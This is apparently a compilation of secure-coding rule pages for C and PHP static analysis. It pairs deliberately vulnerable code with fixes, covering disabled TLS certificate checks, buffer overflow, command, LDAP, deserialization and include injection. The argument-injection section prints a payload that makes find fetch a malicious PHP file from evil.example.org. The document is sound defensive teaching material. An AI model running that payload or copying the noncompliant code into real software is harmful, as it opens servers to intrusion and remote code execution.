Don’t hard-code the IP address in the source code, instead make it configurable with environment variables, configuration files, or a similar approach. Alternatively, if confidentially is not required a domain name can be used since it allows to change the destination quickly without having to rebuild the software.

Sensitive Code Example

dbi_conn conn = dbi_conn_new("mysql");
string host = "10.10.0.1"; // Sensitive
dbi_conn_set_option(conn, "host", host.c_str());
dbi_conn_set_option(conn, "host", "10.10.0.1"); // Sensitive

Compliant Solution

dbi_conn conn = dbi_conn_new("mysql");
string host = getDatabaseHost(); // Compliant
dbi_conn_set_option(conn, "host", host.c_str()); // Compliant

Exceptions

No issue is reported for the following cases because they are not considered sensitive:

  • Loopback addresses 127.0.0.0/8 in CIDR notation (from 127.0.0.0 to 127.255.255.255)
  • Broadcast address 255.255.255.255
  • Non-routable address 0.0.0.0
  • Strings of the form 2.5.<number>.<number> as they often match Object Identifiers (OID)
  • Addresses in the ranges 192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24, reserved for documentation purposes by RFC 5737
  • Addresses in the range 2001:db8::/32, reserved for documentation purposes by RFC 3849

See

c:S4830

This vulnerability makes it possible that an encrypted communication is intercepted.

Why is this an issue?

Transport Layer Security (TLS) provides secure communication between systems over the internet by encrypting the data sent between them. The role of certificate validation in this process is to ensure that a system is indeed the one it claims to be, adding an extra layer of trust and security.

When certificate validation is disabled, the client skips this critical check. This creates an opportunity for attackers to pose as a trusted entity and intercept, manipulate, or steal the data being transmitted.

What is the potential impact?

Establishing trust in a secure way is a non-trivial task. When you disable certificate validation, you are removing a key mechanism designed to build this trust in internet communication, opening your system up to a number of potential threats.

Identity spoofing

If a system does not validate certificates, it cannot confirm the identity of the other party involved in the communication. An attacker can exploit this by creating a fake server and masquerading it as a legitimate one. For example, they might set up a server that looks like your bank’s server, tricking your system into thinking it is communicating with the bank. This scenario, called identity spoofing, allows the attacker to collect any data your system sends to them, potentially leading to significant data breaches.

Loss of data integrity

When TLS certificate validation is disabled, the integrity of the data you send and receive cannot be guaranteed. An attacker could modify the data in transit, and you would have no way of knowing. This could range from subtle manipulations of the data you receive to the injection of malicious code or malware into your system. The consequences of such breaches of data integrity can be severe, depending on the nature of the data and the system.

How to fix it in Botan

Code examples

The following code contains examples of disabled certificate validation.

The certificate validation gets disabled by overriding tls_verify_cert_chain with an empty implementation. It is highly recommended to use the original implementation.

Noncompliant code example

#include <botan/tls_client.h>
#include <botan/tls_callbacks.h>
#include <botan/tls_session_manager.h>
#include <botan/tls_policy.h>
#include <botan/auto_rng.h>
#include <botan/certstor.h>
#include <botan/certstor_system.h>

class Callbacks : public Botan::TLS::Callbacks
{
    virtual void tls_verify_cert_chain(
              const std::vector<Botan::X509_Certificate> &cert_chain,
              const std::vector<std::shared_ptr<const Botan::OCSP::Response>> &ocsp_responses,
              const std::vector<Botan::Certificate_Store *> &trusted_roots,
              Botan::Usage_Type usage,
              const std::string &hostname,
              const Botan::TLS::Policy &policy)
    override  { }
};

class Client_Credentials : public Botan::Credentials_Manager { };

void connect() {
    Callbacks callbacks;
    Botan::AutoSeeded_RNG rng;
    Botan::TLS::Session_Manager_In_Memory session_mgr(rng);
    Client_Credentials creds;
    Botan::TLS::Strict_Policy policy;

    Botan::TLS::Client client(callbacks, session_mgr, creds, policy, rng,
                              Botan::TLS::Server_Information("example.com", 443),
                              Botan::TLS::Protocol_Version::TLS_V12); // Noncompliant
}

Compliant solution

#include <botan/tls_client.h>
#include <botan/tls_callbacks.h>
#include <botan/tls_session_manager.h>
#include <botan/tls_policy.h>
#include <botan/auto_rng.h>
#include <botan/certstor.h>
#include <botan/certstor_system.h>

class Callbacks : public Botan::TLS::Callbacks { };

class Client_Credentials : public Botan::Credentials_Manager { };

void connect() {
    Callbacks callbacks;
    Botan::AutoSeeded_RNG rng;
    Botan::TLS::Session_Manager_In_Memory session_mgr(rng);
    Client_Credentials creds;
    Botan::TLS::Strict_Policy policy;

    Botan::TLS::Client client(callbacks, session_mgr, creds, policy, rng,
                              Botan::TLS::Server_Information("example.com", 443),
                              Botan::TLS::Protocol_Version::TLS_V12);
}

How does this work?

Addressing the vulnerability of disabled TLS certificate validation primarily involves re-enabling the default validation.

To avoid running into problems with invalid certificates, consider the following sections.

Using trusted certificates

If possible, always use a certificate issued by a well-known, trusted CA for your server. Most programming environments come with a predefined list of trusted root CAs, and certificates issued by these authorities are validated automatically. This is the best practice, and it requires no additional code or configuration.

Working with self-signed certificates or non-standard CAs

In some cases, you might need to work with a server using a self-signed certificate, or a certificate issued by a CA not included in your trusted roots. Rather than disabling certificate validation in your code, you can add the necessary certificates to your trust store.

Resources

Documentation

Standards

c:S5801

In C, a string is just a buffer of characters, normally using the null character as a sentinel for the end of the string. This means that the developer has to be aware of low-level details such as buffer sizes or having an extra character to store the final null character. Doing that correctly and consistently is notoriously difficult and any error can lead to a security vulnerability, for instance, giving access to sensitive data or allowing arbitrary code execution.

The function char *strcpy(char * restrict dest, const char * restrict src); copies characters from src to dest. The wcscpy does the same for wide characters and should be used with the same guidelines.

Note: the functions strncpy and wcsncpy might look like attractive safe replacements for strcpy and wcscpy, but they have their own set of issues (see S5816), and you should probably prefer another more adapted alternative.

Ask Yourself Whether

  • There is a possibility that either the source or the destination pointer is null
  • There is a possibility that the source string is not correctly null-terminated, or that its length (including the final null character) can be larger than the size of the destination buffer.
  • There is an overlap between source and destination

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • C11 provides, in its annex K, the strcpy_s and the wcscpy_s that were designed as safer alternatives to strcpy and wcscpy. It’s not recommended to use them in all circumstances, because they introduce a runtime overhead and require to write more code for error handling, but they perform checks that will limit the consequences of calling the function with bad arguments.
  • Even if your compiler does not exactly support annex K, you probably have access to similar functions, for example, strlcpy in FreeBSD
  • If you are writing C++ code, using std::string to manipulate strings is much simpler and less error-prone

Sensitive Code Example

int f(char *src) {
  char dest[256];
  strcpy(dest, src); // Sensitive: might overflow
  return doSomethingWith(dest);
}

Compliant Solution

int f(char *src) {
  char *dest = malloc(strlen(src) + 1); // For the final 0
  strcpy(dest, src); // Compliant: we made sure the buffer is large enough
  int r= doSomethingWith(dest);
  free(dest);
  return r;
}

See

c:S5802

The purpose of creating a jail, the "virtual root directory" created with chroot-type functions, is to limit access to the file system by isolating the process inside this jail. However, many chroot function implementations don’t modify the current working directory, thus the process has still access to unauthorized resources outside of the "jail".

Ask Yourself Whether

  • The application changes the working directory before or after running chroot.
  • The application uses a path inside the jail directory as working directory.

There is a risk if you answered no to any of those questions.

Recommended Secure Coding Practices

Change the current working directory to the root directory after switching to a jail directory.

Sensitive Code Example

The current directory is not changed with the chdir function before or after the creation of a jail with the chroot function:

const char* root_dir = "/jail/";
chroot(root_dir); // Sensitive: no chdir before or after chroot, and missing check of return value

The chroot or chdir operations could fail and the process still have access to unauthorized resources. The return code should be checked:

const char* root_dir = "/jail/";
chroot(root_dir); // Sensitive: missing check of the return value
const char* any_dir = "/any/";
chdir(any_dir); // Sensitive: missing check of the return value

Compliant Solution

To correctly isolate the application into a jail, change the current directory with chdir before the chroot and check the return code of both functions:

const char* root_dir = "/jail/";

if (chdir(root_dir) == -1) {
  exit(-1);
}

if (chroot(root_dir) == -1) {  // compliant: the current dir is changed to the jail and the results of both functions are checked
  exit(-1);
}

See

phpsecurity:S2631

Why is this an issue?

Regular expression injections occur when the application retrieves untrusted data and uses it as a regex to pattern match a string with it.

Most regular expression search engines use backtracking to try all possible regex execution paths when evaluating an input. Sometimes this can lead to performance problems also referred to as catastrophic backtracking situations.

What is the potential impact?

In the context of a web application vulnerable to regex injection:
After discovering the injection point, attackers insert data into the vulnerable field to make the affected component inaccessible.

Depending on the application’s software architecture and the injection point’s location, the impact may or may not be visible.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Self Denial of Service

In cases where the complexity of the regular expression is exponential to the input size, a small, carefully-crafted input (for example, 20 chars) can trigger catastrophic backtracking and cause a denial of service of the application.

Super-linear regex complexity can produce the same effects for a large, carefully crafted input (thousands of chars).

If the component jeopardized by this vulnerability is not a bottleneck that acts as a single point of failure (SPOF) within the application, the denial of service might only affect the attacker who initiated it.

Such benign denial of service can also occur in architectures that rely heavily on containers and container orchestrators. Replication systems would detect the failure of a container and automatically replace it.

Infrastructure SPOFs

However, a denial of service attack can be critical to the enterprise if it targets a SPOF component. Sometimes the SPOF is a software architecture vulnerability (such as a single component on which multiple critical components depend) or an operational vulnerability (for example, insufficient container creation capabilities or failures from containers to terminate).

In either case, attackers aim to exploit the infrastructure weakness by sending as many malicious payloads as possible, using potentially huge offensive infrastructures.

These threats are particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP).

How to fix it in Core PHP

Code examples

The following noncompliant code is vulnerable to Regex Denial of Service (ReDoS) because untrusted data is used as a regex to scan a string without prior sanitization or validation.

Noncompliant code example

function lookup(string $data): bool {
  $regex = $_GET["regex"];
  return preg_match($regex, $data); // Noncompliant
}

Compliant solution

function lookup(string $data): bool {
  $regex = $_GET["regex"];
  return preg_match(preg_quote($regex), $data);
}

How does this work?

Sanitization and Validation

Metacharacters escape using native functions is a solution against regex injection.
The escape function sanitizes the input so that the regular expression engine interprets these characters literally.

An allowlist approach can also be used by creating a list containing authorized and secure strings you want the application to use in a query.
If a user input does not match an entry in this list, it should be considered unsafe and rejected.

Important Note: The application must sanitize and validate on the server side. Not on client-side front end.

Where possible, use non-backtracking regex engines, for example, Google’s re2.

In the compliant solution, preg_quote escapes metacharacters and escape sequences that could have broken the initially intended logic.

Resources

Articles & blog posts

Standards

phpsecurity:S5883

Why is this an issue?

OS command argument injections occur when applications allow the execution of operating system commands from untrusted data but the untrusted data is limited to the arguments.
It is not possible to directly inject arbitrary commands that compromise the underlying operating system, but the behavior of the executed command still might be influenced in a way that allows to expand access, for example, execution of arbitrary commands. The security of the application depends on the behavior of the application that is executed.

What is the potential impact?

An attacker exploiting an arguments injection vulnerability will be able to add arbitrary argument to a system binary call. Depending on the command the parameters are added to, this might lead to arbitrary command execution.

The impact depends on the access control measures taken on the target system OS. In the worst-case scenario, the process runs with root privileges, and therefore any OS commands or programs may be affected.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Denial of service and data leaks

In this scenario, the attack aims to disrupt the organization’s activities and profit from data leaks.

An attacker could, for example:

  • download the internal server’s data, most likely to sell it
  • modify data, send malware
  • stop services or exhaust resources (with fork bombs for example)

This threat is particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP).

Root privilege escalation and pivot

In this scenario, the attacker can do everything described in the previous section. The difference is that the attacker also manages to elevate their privileges to an administrative level and attacks other servers.

Here, the impact depends on how much the target company focuses on its Defense In Depth. For example, the entire infrastructure can be compromised by a combination of OS injections and misconfiguration of:

  • Docker or Kubernetes clusters
  • cloud services
  • network firewalls and routing
  • OS access control

How to fix it in Core PHP

Code examples

The following code uses the find command and expects the user to enter the name of a file to find on the system.

It is vulnerable to argument injection because untrusted data is inserted in the arguments of a process call without prior validation or sanitization.
Here, the application ignores that a user-submitted parameter might contain special characters that will tamper with the expected system command behavior.

In this particular case, an attacker might add arbitrary arguments to the find command for malicious purposes. For example, the following payload will download malicious software on the application’s hosting server.

 -exec curl -o /var/www/html/ http://evil.example.org/malicious.php ;

Other standard PHP functions are susceptible to the same vulnerable behavior. Especially, the mail function accepts, as its fifth argument, parameters that will be appended to the configured mail-sending program command line. This might lead to a similar exploitation scenario.

Noncompliant code example

$arg=$_GET['file'];
echo "<h1>File search results:</h1><br/>";
$cmd=escapeshellcmd('find /tmp/images -iname ' . $arg);
passthru($cmd);
$arg=$_GET['arg'];
echo "<h1>Sending test mail.</h1><br/>";
mail("mail@example.org", "example subject", "Example", [], $arg);

Compliant solution

$arg=$_GET['file'];
echo "<h1>File search results:</h1><br/>";
$cmd='find /tmp/images -iname ' . escapeshellarg($arg);
passthru($cmd);
$arg=$_GET['arg'];
echo "<h1>Sending test mail.</h1><br/>";

$allowed_args_mapping = ["-n","-v"];
if (! in_array($arg, $allowed_args_mapping, true)) {
	$arg = "";
}
mail("mail@example.org", "example subject", "Example", [], $arg);

How does this work?

Allowing users to insert data in operating system commands generally creates more problems than it solves.

Anything that can be done via operating system commands can usually be done via a language’s native SDK.
Therefore, our suggestion is to avoid using OS commands in the first place.

When building a system command from user-submitted data is unavoidable, using the escapeshellarg sanitizing function should be preferred. It ensures that the provided data will be considered a single argument and prevents the injection of subsequent ones.

It is also important not to combine both escapeshellarg and escapeshellcmd. Indeed, a call to escapeshellcmd on a complete command line will void any escaping previously added with escapeshellarg.

Therefore, it is impossible to prevent an argument injection issue in the mail function with escapeshellarg. Indeed, mail internally relies on escapeshellcmd for escaping purposes. In that case, an allowlist of explicitly trusted additional arguments should be used.

Resources

Documentation

Standards

phpsecurity:S5135

Why is this an issue?

Deserialization injections occur when applications deserialize wholly or partially untrusted data without verification.

What is the potential impact?

In the context of a web application performing unsafe deserialization:
After detecting the injection vector, attackers inject a carefully-crafted payload into the application.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Application-specific attacks

In this scenario, the attackers succeed in injecting an object of the expected class, but with malicious properties that affect the object’s behavior.

If the application relies on the properties of the deserialized object, attackers can modify the data structure or content to escalate privileges or perform unwanted actions.
In the context of an e-commerce application, this could be changing the number of products or prices.

Full application compromise

In the worst-case scenario, the attackers succeed in injecting an object of a completely different class than expected, triggering code execution.

Depending on the attacker, code execution can be used with different intentions:

  • Download the internal server’s data, most likely to sell it.
  • Modify data, install malware, for instance, malware that mines cryptocurrencies.
  • Stop services or exhaust resources, for instance, with fork bombs.

This threat is particularly insidious if the attacked organization does not maintain a Disaster Recovery Plan (DRP).

Root privilege escalation and pivot

In this scenario, the attacker can do everything described in the previous section. The difference is that the attacker additionally manages to elevate his privileges as an administrator and attack other servers.

Here, the impact depends on how much the target company focuses on its Defense In Depth. For example, the entire infrastructure can be compromised through a combination of unsafe deserialization and misconfiguration:

  • Docker or Kubernetes clusters
  • cloud services
  • network firewalls and routing
  • OS access control

How to fix it in Core PHP

Code examples

The following code is vulnerable to deserialization attacks because it deserializes HTTP data without validating it first.

Noncompliant code example

$cookie = $_COOKIE['session'];
$session = unserialize($session); // Noncompliant

echo $session->auth ? "OK" : "KO";

Compliant solution

$cookie = $_COOKIE['session'];
list($session, $mac) = explode('|', $cookie, 2);
$hash = hash_hmac("sha256", $session, $KEY);

if (hash_equals($hash, $mac)) {
    $session = unserialize($session);
} else {
    die;
}

echo $session->auth ? "OK" : "KO";

How does this work?

Allowing users to provide data for deserialization generally creates more problems than it solves.

Anything that can be done through deserialization can generally be done with more secure data structures.
Therefore, our first suggestion is to avoid deserialization in the first place.

However, if deserialization mechanisms are valid in your context, here are some security suggestions.

More secure serialization methods

Some more secure serialization methods reduce the risk of security breaches, although not definitively.

A complete object serializer is probably unnecessary if you only need to receive primitive data (for example integers, strings, bools, etc.).
In this case, formats such as JSON and XML protect the application from deserialization attacks by default.

For more complex objects, the next step is to control which class fields are exposed by creating class-specific serialization methods.
The most common method is to use Data Transfer Objects (DTO) patterns or Google Protocol Buffers (protobufs). After creating the Protobuf data structure, the Protobuf compiler creates class files that handle operations such as serializing and deserializing data.

Integrity check

Message authentication codes (MAC) can be used to prevent tampering with serialized data that is meant to be stored outside the application server:

  • On the server-side, when serializing an object, compute a MAC of the result and append it to the serialized object string.
  • When the serialized value is submitted back, verify the serialization string MAC on the server side before deserialization.

Depending on the situation, two MAC computation modes can be used.

If the same application will be responsible for the MAC computing and validation, a symmetric signature algorithm can be used. In that case, HMAC should be preferred, with a strong underlying hash algorithm such as SHA-256.

If multiple parties have to validate the serialized data, an asymetric signature algorithm should be used. This will reduce the chances for a signing secret to be leaked. In that case, the RSASSA-PSS algorithm can be used.

Note: Be sure to store the signing secret securely.

Here, the compliant code example uses the hash_hmac function to compute the integrity tag of the untrusted data. The underlying hash algorithm is set to sha256, which is considered strong for this use case.

Pre-Approved classes

As a last resort, create a list of approved and safe classes that the application should be able to deserialize.
If the untrusted class does not match an entry in this list, it should be rejected because it is considered unsafe.

Note: Untrusted classes should be filtered out during deserialization, not after.
Depending on the language or framework, this should be possible by overriding the serialization process or using native capabilities to restrict type deserialization.

Pitfalls

Non-constant time authenticity checks

When using a MAC to validate the authenticity of an untrusted serialized string, it is important to rely on constant time implementations. Indeed, in most cases, classical string equality check operators work lazily. As soon as a difference is found between two strings, they consider them different and return. Their response time will therefore vary depending on where the first difference has been found.

In security-sensitive contexts, this difference in execution time leaks information about the secret value being compared. It allows for timing attacks that could void the authenticity check.

The compliant code example uses the hash_equals function to compare authentication tags. This one benefits from constant-time implementation.

Resources

Standards

phpsecurity:S2078

Why is this an issue?

LDAP injections occur in an application when the application retrieves untrusted data and inserts it into an LDAP query without sanitizing it first.

An LDAP injection can either be basic or blind, depending on whether the server’s fetched data is directly returned in the web application’s response.
The absence of the corresponding response for the malicious request on the application is not a barrier to exploitation. Thus, it must be treated the same way as basic LDAP injections.

What is the potential impact?

In the context of a web application vulnerable to LDAP injection: after discovering the injection point, attackers insert data into the vulnerable field to execute malicious LDAP commands.

The impact of this vulnerability depends on how vital LDAP servers are to the organization.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Data leakage or corruption

In typical scenarios where systems perform innocuous LDAP operations to find users or create inventories, an LDAP injection could result in data leakage or corruption.

Privilege escalation

A malicious LDAP query could allow an attacker to impersonate a low-privileged user or an administrator in scenarios where systems perform authorization checks or authentication.

Attackers use this vulnerability to find multiple footholds on target organizations by gathering authentication bypasses.

How to fix it in Core PHP

Code examples

The following noncompliant code is vulnerable to LDAP injection because untrusted data is concatenated to an LDAP query without prior sanitization or validation.

Noncompliant code example

$ldapconn = ldap_connect("localhost");

if($ldapconn){
  $user = $_GET["user"];

  $filter = "(&(objectClass=user)(uid=" . $user . "))";
  $dn = "dc=example,dc=org";

  ldap_list($ldapconn, $dn, $filter); // Noncompliant
}

Compliant solution

$ldapconn = ldap_connect("localhost");

if($ldapconn){
  $user = $ldap_escape($_GET["user"], "", LDAP_ESCAPE_FILTER);

  $filter = "(&(objectClass=user)(uid=" . $user . "))";
  $dn = "dc=example,dc=org";

  ldap_list($ldapconn, $dn, $filter);
}

How does this work?

As a rule of thumb, the best approach to protect against injections is to systematically ensure that untrusted data cannot break out of the initially intended logic.

For LDAP injection, the cleanest way to do so is to use parameterized queries if it is available for your use case.

Another approach is to sanitize the input before using it in an LDAP query. Input sanitization should be primarily done using native libraries.

Alternatively, validation can be implemented using an allowlist approach by creating a list of authorized and secure strings you want the application to use in a query. If a user input does not match an entry in this list, it should be rejected because it is considered unsafe.

Important note: The application must sanitize and validate on the server-side. Not on client-side front-ends.

The most fundamental security mechanism is the restriction of LDAP metacharacters.

For Distinguished Names (DN), special characters that need to be escaped include:

  • \
  • #
  • +
  • <
  • >
  • ,
  • ;
  • "
  • =

For Search Filters, special characters that need to be escaped include:

  • *
  • (
  • )
  • \
  • null

For PHP, the core library function ldap_escape allows sanitizing these characters.

In the compliant solution example, the ldap_escape function is used with the LDAP_ESCAPE_FILTER flag, which sanitizes potentially malicious characters in the search filter. The function can also be used with the LDAP_ESCAPE_DN flag, which sanitizes the distinguished name (DN).

Resources

Standards

phpsecurity:S5146

Why is this an issue?

Open redirection occurs when an application uses user-controllable data to redirect users to a URL.

An attacker with malicious intent could manipulate a user to browse into a specially crafted URL, such as https://trusted.example.com?url=evil.example.com, to redirect the victim to his evil domain.

Tricking users into sending the malicious HTTP request is usually the main task of exploiting an open redirection. Often, it requires an attacker to build a credible pretext to prevent suspicions from the victim.

Attackers commonly use open redirect exploits in mass phishing campaigns.

What is the potential impact?

If an attacker tricks a user into opening a link of his choice, the user is redirected to a domain controlled by the attacker.

From then on, the attacker can perform various malicious actions, some more impactful than others.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Domain Mirroring

A malicious link redirects to an attacker’s controlled website mirroring the interface of a web application trusted by the user. Due to the similarity in the application appearance and the apparently trustable clicked hyperlink, the user struggles to identify that they are browsing on a malicious domain.

Depending on the attacker’s purpose, the malicious website can leak credentials, bypass Multi-Factor Authentication (MFA), and reach any authenticated data or action.

Malware Distribution

A malicious link redirects to an attacker’s controlled website that serves malware. On the same basis as the domain mirroring exploitation, the attacker develops a spearphishing or phishing campaign with a carefully crafted pretext that would result in the download and potential execution of a hosted malicious file.
The worst-case scenario could result in complete system compromise.

How to fix it in Core PHP

Code examples

The following noncompliant code example is vulnerable to open redirection as it constructs a URL with user-controllable data. This URL is then used to redirect the user without being first validated. An attacker can leverage this to manipulate users into performing unwanted redirects.

Noncompliant code example

$url=$_GET['url'];

header("Location: " . $url); // Noncompliant

Compliant solution

$url=$_GET['url'];

$allowedUrls = ['https://example.com/'];

if(in_array($url, $allowedUrls, true)){
  header("Location: " . $url);
}

How does this work?

Built-in framework methods should be preferred as, more often than not, these provide additional security mechanisms. Usually, these built-in methods are engineered for internal page redirections. Thus, they might not be the solution for the reader’s use case.

In case the application strictly requires external redirections based on user-controllable data, this could be done using the following alternatives:

  1. Validating the authority part of the URL against a statically defined value (see Pitfalls).
  2. Using an allow-list approach in case the destination URLs are multiple but limited.
  3. Adding a customized page to which users are redirected, warning about the imminent action and requiring manual authorization to proceed.

Pitfalls

The trap of 'StartsWith' and equivalents

When validating untrusted URLs by checking if they start with a trusted scheme and authority pair scheme://authority, ensure that the validation string contains a path separator / as the last character.

If the validation string does not contain a terminating path separator, the Open Redirect vulnerability remains; only the exploitation technique changes.

Thus, a validation like startsWith("https://example.com") or an equivalent with the regex ^https://example\.com.* can be exploited with the following URL https://example.com.malicious.io. The practice of taking over domains that maliciously look like existing domains is widespread and is called Cybersquatting.

Resources

Standards

phpsecurity:S5145

Why is this an issue?

Log injection occurs when an application fails to sanitize untrusted data used for logging.

An attacker can forge log content to prevent an organization from being able to trace back malicious activities.

What is the potential impact?

If an attacker can insert arbitrary data into a log file, the integrity of the chain of events being recorded can be compromised.
This frequently occurs because attackers can inject the log entry separator of the logger framework, commonly newlines, and thus insert artificial log entries.
Other attacks could also occur requiring only field pollution, such as cross-site scripting (XSS) or code injection (for example, Log4Shell) if the logged data is fed to other application components, which may interpret the injected data differently.

The focus of this rule is newline character replacement.

Log Forge

An attacker, able to create independent log entries by injecting log entry separators, inserts bogus data into a log file to conceal his malicious activities. This obscures the content for an incident response team to trace the origin of the breach as the indicators of compromise (IoCs) lead to fake application events.

How to fix it in Core PHP

Code examples

The following code is vulnerable to log injection as it constructs log entries using untrusted data. An attacker can leverage this to manipulate the chain of events being recorded.

Noncompliant code example

$input = $_GET["input"];

error_log($input); // Noncompliant

Compliant solution

$input = $_GET["input"];

if(preg_match("/[^A-Za-z0-9-_]/", $input)){
  $safeinput = '[' . base64_encode($input) . ']';
}else{
  $safeinput = $input;
}
error_log($safeinput);

How does this work?

Data used for logging should be content-restricted and typed. This can be done by validating the data content or sanitizing it.
Validation and sanitization mainly revolve around preventing carriage return (CR) and line feed (LF) characters. However, further actions could be required based on the application context and the logged data usage.

Here, the example compliant code uses the preg_match function to check if the input contains any unsafe character. In which case, the base64_encode function is used to prevent any injection while keeping the input original content.

Resources

Standards

phpsecurity:S5167

This rule is deprecated; use S5122, S5146, S6287 instead.

Why is this an issue?

User-provided data, such as URL parameters, POST data payloads, or cookies, should always be considered untrusted and tainted. Applications constructing HTTP response headers based on tainted data could allow attackers to change security sensitive headers like Cross-Origin Resource Sharing headers.

Web application frameworks and servers might also allow attackers to inject new line characters in headers to craft malformed HTTP response. In this case the application would be vulnerable to a larger range of attacks like HTTP Response Splitting/Smuggling. Most of the time this type of attack is mitigated by default modern web application frameworks but there might be rare cases where older versions are still vulnerable.

As a best practice, applications that use user-provided data to construct the response header should always validate the data first. Validation should be based on a whitelist.

Noncompliant code example

$value = $_GET["value"];
header("X-Header: $value"); // Noncompliant

Compliant solution

$value = $_GET["value"];
if (ctype_alnum($value)) {
  header("X-Header: $value"); // Compliant
} else {
  // Error
}

Resources

phpsecurity:S5335

Why is this an issue?

Include injections occur in an application when the application retrieves data from a user or a third-party service and inserts it into an include expression without sanitizing it first.

If an application contains an include expression that is vulnerable to injections, it is exposed to attacks that target the underlying server.

What is the potential impact?

A user with malicious intent can create requests that will cause the include expression to leak valuable data or achieve remote code execution on the server’s website.

After creating the malicious request, the attacker can attack the servers affected by this vulnerability without relying on any prerequisites.

The impact depends on the access control measures taken on the target system OS. In the worst-case scenario, the process runs with root privileges, and therefore any OS commands or programs may be affected.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Denial of service and data leaks

In this scenario, the attack aims to disrupt the organization’s activities and profit from data leaks.

An attacker could, for example:

  • download the internal server’s data, most likely to sell it
  • modify data, send malware
  • stop services or exhaust resources (with fork bombs for example)

This threat is particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP).

Root privilege escalation and pivot

In this scenario, the attacker can do everything described in the previous section. The difference is that the attacker also manages to elevate their privileges to an administrative level and attacks other servers.

Here, the impact depends on how much the target company focuses on its Defense In Depth. For example, the entire infrastructure can be compromised by a combination of OS injections and misconfiguration of:

  • Docker or Kubernetes clusters
  • cloud services
  • network firewalls and routing
  • OS access control

How to fix it

Code examples

Noncompliant code example

$filename = $_GET["filename"];
include $filename; // Noncompliant

Compliant solution

$INCLUDE_ALLOW_LIST = [
    "home.php",
    "dashboard.php",
    "profile.php",
    "settings.php"
];

$filename = $_GET["filename"];
if (in_array($filename, $INCLUDE_ALLOW_LIST)) {
  include $filename;
}

How does this work?

Pre-Approved files

The cleanest way to avoid this defect is to validate the input before using it in an include-type expression.

Create a list of authorized and secure files that you want the application to be able to load with include-type expressions.
If a user input does not match an entry in this list, it should be rejected because it is considered unsafe.

Important note: The application must do validation on the server side. Not on client-side front-ends.

Resources

phpsecurity:S2076

Why is this an issue?

OS command injections occur when applications build command lines from untrusted data before executing them with a system shell.
In that case, an attacker can tamper with the command line construction and force the execution of unexpected commands. This can lead to the compromise of the underlying operating system.

What is the potential impact?

An attacker exploiting an OS command injection vulnerability will be able to execute arbitrary commands on the underlying operating system.

The impact depends on the access control measures taken on the target system OS. In the worst-case scenario, the process runs with root privileges, and therefore any OS commands or programs may be affected.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Denial of service and data leaks

In this scenario, the attack aims to disrupt the organization’s activities and profit from data leaks.

An attacker could, for example:

  • download the internal server’s data, most likely to sell it
  • modify data, send malware
  • stop services or exhaust resources (with fork bombs for example)

This threat is particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP).

Root privilege escalation and pivot

In this scenario, the attacker can do everything described in the previous section. The difference is that the attacker also manages to elevate their privileges to an administrative level and attacks other servers.

Here, the impact depends on how much the target company focuses on its Defense In Depth. For example, the entire infrastructure can be compromised by a combination of OS injections and misconfiguration of:

  • Docker or Kubernetes clusters
  • cloud services
  • network firewalls and routing
  • OS access control

How to fix it in Core PHP

Code examples

The following code is vulnerable to command injections because it is using untrusted inputs to set up a new process. Therefore an attacker can execute an arbitrary program that is installed on the system.

Noncompliant code example

$command = $_GET['cmd'];
exec($command, $output, $ret); // Noncompliant

echo ($ret == 0 ? "OK" : "KO");

Compliant solution

$allowedCommands = [["/bin/ping","-c","1","--"],["/usr/bin/host","--"]];
$cmd = $allowedCommands[$_GET["cmdId"]];
$cmd[] = $_GET["host"];

$process = proc_open($cmd, [], $pipes);
$ret = proc_close($process);

echo ($ret == 0 ? "OK" : "KO");

How does this work?

Allowing users to execute operating system commands generally creates more problems than it solves.

Anything that can be done via operating system commands can usually be done via a language’s native SDK.
Therefore, our first suggestion is to avoid using OS commands in the first place.
However, if the application requires running OS commands with user-controlled data, here are some security suggestions.

Pre-Approved commands

If the application aims to execute only a small number of OS commands (for example, ls, pwd, and grep), the cleanest way to avoid this problem is to validate the input before using it in an OS command.

Create a list of authorized and secure commands that you want the application to be able to execute. Use absolute paths to avoid any ambiguity.
If a user input does not match an entry in this list, it should be rejected because it is considered unsafe.

Depending on the number of commands you want the application to support, the list can be either a regex string or any array type. If you use regexes, choose simple regexes to avoid ReDOS attacks. For example, you can accept only a specific set of executables, by using ^/bin/(ls|pwd|grep)$.

Important note: The application must do validation on the server side. Not on client-side front-ends.

In the example compliant code, a static list of allowed commands is used. Users are only allowed to provide a command index that will be used to access this list. The command resulting from the list access can be considered trusted.

Neutralize special characters

If the application is to execute complex commands that cannot be controlled thanks to pre-approved lists, the cleanest approach is to use special sanitization components, such as proc_open.

The library helps you to get rid of common dangerous characters, such as:

  • &
  • |
  • ;
  • $
  • >
  • <
  • \`
  • \\
  • !

If user input is to be included in the arguments of a command, the application must ensure that dangerous options or argument delimiters are neutralized.
Argument delimiters count ', - and spaces.

For example, the find command from UNIX supports the dangerous argument -exec.
In this case, option processing can be terminated with a string containing -- or with special options. For example, git supports --end-of-options since its version 2.24.

In the example compliant code, the proc_open function is used in place of the less safe exec alternative. Moreover, the command parameter of this function is set to an array. That way, the function will properly escape all the array elements and concatenate them to form the command line to execute.

Disable shell integration

In most cases, command execution libraries propose two ways to execute external program: with or without shell integration.

When shell integration is allowed, an attacker with control over the command arguments can simply execute additional external programs using system shell features. For example, on Unix, command pipelining (|) or string interpolation ($(), <(), etc.) can be used to break out of a command call.

Therefore, it is generally preferable to disable shell integration.

In the example compliant code, using the proc_open function with an array of arguments as a parameter disables shell integration.

Resources

Documentation

Standards

phpsecurity:S5334

Why is this an issue?

Code injections occur when applications allow the dynamic execution of code instructions from untrusted data.
An attacker can influence the behavior of the targeted application and modify it to get access to sensitive data.

What is the potential impact?

An attacker exploiting a dynamic code injection vulnerability will be able to execute arbitrary code in the context of the vulnerable application.

